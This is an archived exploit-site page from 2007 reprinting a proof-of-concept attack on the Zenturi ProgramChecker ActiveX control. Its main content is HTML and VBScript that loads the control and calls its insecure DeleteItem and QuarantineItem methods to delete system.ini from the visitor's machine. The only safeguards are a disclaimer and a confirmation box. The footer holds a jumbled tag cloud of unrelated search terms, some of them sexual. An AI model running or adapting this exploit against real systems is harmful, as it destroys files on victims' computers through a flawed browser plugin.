about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Zenturi ProgramChecker ActiveX Multiple Insecure Methods Exploit




2007-06-09 Zenturi ProgramChecker ActiveX Multiple Insecure Methods Exploit
Rated as : High Risk

<pre>
<code><span style="font: 10pt Courier New;"><span
class="general1-symbol">-----------------------------------------------------------------------------
 <b>Zenturi ProgramChecker ActiveX Control Multiple Insecure
Methods</b>
 url: http://www.programchecker.com/activeintro.aspx

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 This was written for educational purpose. Use it at your own risk.
 Author will be not be responsible for any damage.
 
 <b><font color="#FF0000">THE EXPLOIT WILL DELETE
THE system.ini FILE SO BE SURE TO MAKE A COPY OF
 IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT
RESTART!</font></b>

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer
7
-----------------------------------------------------------------------------

<object classid='clsid:41A5D8DB-EA47-4DE9-B249-1F55738FEA20' id='test'
width='0' height='0'></object>

<input language=VBScript onclick=tryMe() type=button value="Click
here to start the test">

<select style="width: 404px" name="Pucca">
  <option value = "DeleteItem">DeleteItem</option>

  <option value =
"QuarantineItem">QuarantineItem</option>
</select>

<script language='vbscript'>
 Sub tryMe
  On Error Resume Next
   Dim MyMsg
   If(MsgBox("This was written for educational purpose. Use it at
your own risk." & vbCrLf & _
             "Author will be not be responsible for any damage."
& vbCrLf & vbCrLf & _
             "THIS EXPLOIT WILL DELETE THE system.ini FILE SO BE SURE
TO MAKE A COPY" & _
             " OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT
RESTART!" & VBcRlF & "ARE YOU" & _
             " SURE YOU REALLY WANT TO RUN THIS
EXPLOIT?",4)=vbYes) Then
     if Pucca.value = "DeleteItem" Then
      test.DeleteItem "c:windowssystem_.ini"
,"c:windowssystem_.ini"
      MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf &
"It's deleted.", 64,"Zenturi ProgramChecker ActiveX")
     ElseIf Pucca.value = "QuarantineItem" Then
      test.QuarantineItem "c:windowssystem_.ini"
      MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf &
"It's deleted.", 64,"Zenturi ProgramChecker ActiveX")
     End If
   Else
    MyMsg = MsgBox ("Nice, be safe!", 64, "Zenturi
ProgramChecker ActiveX")
   End If 
 End Sub
</script>
</span></span>
</code></pre>

securitydot.net - 2007-06-09

Advertising

Copyright 2007, SecurityDot
Tue, 07 Oct 2008 10:31:56 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
t116t Tagger LE lanka sexg grand mambo Remo php-nuke 2 inc/cmses/ transfert Sexbehnoos race condi WWW.TAKTAZ earl campb Www.hindix trishaphot xxxnx.com NOSTRADAMU sex jonas Www.ibm.co cache/ Tamil sex IIS 2 ms006 sexyboys sex Vulnerabil /component Www.Chaina japan scho cracker www.sex t119t Www.Pinkwo nargissex Dragon Kni pre t257t Hindi hero Www.Chaina t257t vuln/explo video t577t xmail xoop t577t FEMALE NUD Sexbehnoos /plugins/w Www.Saniam Web Wiz Gu